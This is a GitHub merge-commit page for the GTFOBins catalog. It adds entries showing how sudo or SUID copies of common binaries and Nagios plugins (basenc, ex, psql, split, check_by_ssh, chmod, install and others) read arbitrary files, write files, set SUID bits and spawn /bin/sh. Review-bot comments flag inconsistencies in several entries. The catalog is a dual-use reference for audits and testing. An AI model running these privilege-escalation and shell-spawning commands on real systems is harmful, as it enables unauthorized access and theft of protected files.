Merge pull request #147 from mindfuckup/master

Andrea Cardaci 2020-12-20 21:31:05 +01:00 committed by GitHub
commit 65857d486b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 408 additions and 3 deletions

15
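--- a/_gtfobins/basenc.md
+++ b/_gtfobins/basenc.md
@@ -0,0 +1,15 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+basenc --base64 $LFILE | basenc -d --base64
+suid:
+- code: |
+LFILE=file_to_read
+basenc --base64 $LFILE | basenc -d --base64
+sudo:
+- code: |
+LFILE=file_to_read
+sudo basenc --base64 $LFILE | basenc -d --base64
+---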
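Review bot: The `suid` example in this entry is identical to the unprivileged `file-read` one, because it lacks the `./` prefix that the column, rev, ss, ssh-keyscan, tbl, troff and xmodmap entries in this same commit use for their `suid` blocks. Someone auditing SUID binaries against this list cannot tell from the example that it refers to a SUID copy of the binary. For consistency the line would read `./basenc --base64 $LFILE | basenc -d --base64`. The comm, csplit, join, paste and pr entries have the same gap.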

11
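--- a/_gtfobins/check_by_ssh.md
+++ b/_gtfobins/check_by_ssh.md
@@ -0,0 +1,11 @@
+---
+description: |
+This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+shell:
+- description: The shell will only last 10 seconds.
+code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
+sudo:
+- description: The shell will only last 10 seconds.
+code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
+---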

13
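--- a/_gtfobins/check_cups.md
+++ b/_gtfobins/check_cups.md
@@ -0,0 +1,13 @@
+---
+description: |
+This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+check_cups --extra-opts=@$LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo check_cups --extra-opts=@$LFILE
+---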

21
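--- a/_gtfobins/check_log.md
+++ b/_gtfobins/check_log.md
@@ -0,0 +1,21 @@
+---
+description: |
+This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+OUTPUT=output_file
+check_log -F $LFILE -O $OUTPUT
+cat $OUTPUT
+file-write:
+- code: |
+LFILE=file_to_write
+INPUT=input_file
+check_log -F $INPUT -O $LFILE
+sudo:
+- code: |
+LFILE=file_to_write
+INPUT=input_file
+sudo check_log -F $INPUT -O $LFILE
+---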

13
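--- a/_gtfobins/check_memory.md
+++ b/_gtfobins/check_memory.md
@@ -0,0 +1,13 @@
+---
+description: |
+This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+check_memory --extra-opts=@$LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo check_memory --extra-opts=@$LFILE
+---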

13
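--- a/_gtfobins/check_raid.md
+++ b/_gtfobins/check_raid.md
@@ -0,0 +1,13 @@
+---
+description: |
+This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+check_raid --extra-opts=@$LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo check_raid --extra-opts=@$LFILE
+---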


@ -0,0 +1,26 @@
---
description: |
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
functions:
command:
- description: The host example.net must return a certificate via TLS
code: |
COMMAND=id
OUTPUT=output_file
TF=$(mktemp)
echo "$COMMAND | tee $OUTPUT" > $TF
chmod +x $TF
check_ssl_cert --curl-bin $TF -H example.net
cat $OUTPUT
sudo:
- description: The host example.net must return a certificate via TLS
code: |
COMMAND=id
OUTPUT=output_file
TF=$(mktemp)
echo "$COMMAND | tee $OUTPUT" > $TF
chmod +x $TF
umask 022
check_ssl_cert --curl-bin $TF -H example.net
cat $OUTPUT
---
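Review bot: The description of this new entry names the wrong plugin: it says "This is the `check_by_ssh` Nagios plugin", while every command in the entry invokes `check_ssl_cert`. The sentence appears to be copied from the check_by_ssh entry and should read `This is the `check_ssl_cert` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.` The file header for this section is not visible on the page, so the file name is inferred from the commands.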


@ -0,0 +1,13 @@
---
description: |
This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
functions:
file-read:
- code: |
LFILE=file_to_read
check_statusfile $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo check_statusfile $LFILE
---
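Review bot: The description line contains a leftover word fragment, "Nagios plugi plugin". It should read `This is the `check_statusfile` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.` so that it matches the wording of the other Nagios plugin entries in this commit.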


@ -1,12 +1,12 @@
--- ---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.
functions: functions:
suid: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chmod 0777 $LFILE ./chmod 6777 $LFILE
sudo: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chmod 0777 $LFILE sudo chmod 6777 $LFILE
--- ---
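Review bot: The new description says `6` "denotes the SUID bits", which is imprecise: a leading 6 in the mode is setuid (4) plus setgid (2), so `6777` sets both bits. Wording such as `the leading 6 sets both the SUID and SGID bits` would describe the mode accurately, which matters to anyone using the entry to decide which permission changes to alert on. The install entry added by this commit reuses the same sentence. The file header for this section is not visible on the page; the commands indicate it is the chmod entry.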

17
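--- a/_gtfobins/column.md
+++ b/_gtfobins/column.md
@@ -0,0 +1,17 @@
+---
+description: |
+`column` expects textual data.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+column $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./column $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo column $LFILE
+---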

15
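--- a/_gtfobins/comm.md
+++ b/_gtfobins/comm.md
@@ -0,0 +1,15 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+comm $LFILE /dev/null 2>/dev/null
+suid:
+- code: |
+LFILE=file_to_read
+comm $LFILE /dev/null 2>/dev/null
+sudo:
+- code: |
+LFILE=file_to_read
+sudo comm $LFILE /dev/null 2>/dev/null
+---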

18
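--- a/_gtfobins/csplit.md
+++ b/_gtfobins/csplit.md
@@ -0,0 +1,18 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+csplit $LFILE 1
+cat xx01
+suid:
+- code: |
+LFILE=file_to_read
+csplit $LFILE 1
+cat xx01
+sudo:
+- code: |
+LFILE=file_to_read
+csplit $LFILE 1
+cat xx01
+---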
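Review bot: The `sudo` block of this entry never invokes `sudo`; its lines are identical to the `file-read` block, so the entry does not document the sudo context it is filed under. Every other `sudo` block that follows the project pattern prefixes the binary, which here would be `sudo csplit $LFILE 1`. The same omission is visible in the `sudo` blocks of the pr, psql and split entries and of the section whose commands call `check_ssl_cert`. A reader checking sudoers rules against this list would otherwise have to guess which step runs with elevated privileges.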

24
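--- a/_gtfobins/ex.md
+++ b/_gtfobins/ex.md
@@ -0,0 +1,24 @@
+---
+functions:
+shell:
+- code: |
+ex
+!/bin/sh
+file-write:
+- code: |
+ex file_to_write
+a
+DATA
+.
+w
+q
+file-read:
+- code: |
+ex file_to_read
+,p
+q
+sudo:
+- code: |
+sudo ex
+!/bin/sh
+---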

14
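--- a/_gtfobins/install.md
+++ b/_gtfobins/install.md
@@ -0,0 +1,14 @@
+---
+description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file.
+functions:
+suid:
+- code: |
+LFILE=file_to_change
+TF=$(mktemp)
+./install -m 6777 $LFILE $TF
+sudo:
+- code: |
+LFILE=file_to_change
+TF=$(mktemp)
+sudo install -m 6777 $LFILE $TF
+---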

15
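--- a/_gtfobins/join.md
+++ b/_gtfobins/join.md
@@ -0,0 +1,15 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+join -a 2 /dev/null $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+join -a 2 /dev/null $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo join -a 2 /dev/null $LFILE
+---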


@ -1,5 +1,10 @@
--- ---
functions: functions:
file-read:
- description: The file is typeset and some warning messages may appear.
code: |
LFILE=file_to_read
nroff $LFILE
shell: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)

15
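--- a/_gtfobins/paste.md
+++ b/_gtfobins/paste.md
@@ -0,0 +1,15 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+paste $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+paste $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo paste $LFILE
+---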

16
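--- a/_gtfobins/pr.md
+++ b/_gtfobins/pr.md
@@ -0,0 +1,16 @@
+---
+description: Some bytes are altered so it might not be suitable for binary files.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+pr -T $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+pr -T $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+pr -T $LFILE
+---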

14
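--- a/_gtfobins/psql.md
+++ b/_gtfobins/psql.md
@@ -0,0 +1,14 @@
+---
+description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
+functions:
+shell:
+- code: |
+psql
+\?
+!/bin/sh
+sudo:
+- code: |
+psql
+\?
+!/bin/sh
+---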

15
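--- a/_gtfobins/rev.md
+++ b/_gtfobins/rev.md
@@ -0,0 +1,15 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+rev $LFILE | rev
+suid:
+- code: |
+LFILE=file_to_read
+./rev $LFILE | rev
+sudo:
+- code: |
+LFILE=file_to_read
+sudo rev $LFILE | rev
+---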

27
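--- a/_gtfobins/split.md
+++ b/_gtfobins/split.md
@@ -0,0 +1,27 @@
+---
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+TF=$(mktemp)
+split $LFILE $TF
+cat $TF*
+command:
+- description: Command execution using an existing or newly created file.
+code: |
+COMMAND=id
+TF=$(mktemp)
+split --filter=$COMMAND $TF
+- description: Command execution using stdin (and close it directly).
+code: |
+COMMAND=id
+echo | split --filter=$COMMAND /dev/stdin
+shell:
+- description: The shell prompt is not printed.
+code: |
+split --filter=/bin/sh /dev/stdin
+sudo:
+- description: The shell prompt is not printed.
+code: |
+split --filter=/bin/sh /dev/stdin
+---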

17
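--- a/_gtfobins/ss.md
+++ b/_gtfobins/ss.md
@@ -0,0 +1,17 @@
+---
+description: |
+The file content is actually parsed so only a part of the first line is returned as a part of an error message.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+ss -a -F $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./ss -a -F $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo ss -a -F $LFILE
+---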

17
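--- a/_gtfobins/ssh-keyscan.md
+++ b/_gtfobins/ssh-keyscan.md
@@ -0,0 +1,17 @@
+---
+description: |
+The file content is actually parsed so only a part of each line is returned as a part of an error message.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+ssh-keyscan -f $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./ssh-keyscan -f $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo ssh-keyscan -f $LFILE
+---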

17
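--- a/_gtfobins/tbl.md
+++ b/_gtfobins/tbl.md
@@ -0,0 +1,17 @@
+---
+description: |
+The read file content is corrupted by additional text at the beginning.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+tbl $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./tbl $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo tbl $LFILE
+---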

17
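--- a/_gtfobins/troff.md
+++ b/_gtfobins/troff.md
@@ -0,0 +1,17 @@
+---
+description: |
+The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+troff $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./troff $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo troff $LFILE
+---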

17
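--- a/_gtfobins/xmodmap.md
+++ b/_gtfobins/xmodmap.md
@@ -0,0 +1,17 @@
+---
+description: |
+The read file content is corrupted by error prints.
+functions:
+file-read:
+- code: |
+LFILE=file_to_read
+xmodmap -v $LFILE
+suid:
+- code: |
+LFILE=file_to_read
+./xmodmap -v $LFILE
+sudo:
+- code: |
+LFILE=file_to_read
+sudo xmodmap -v $LFILE
+---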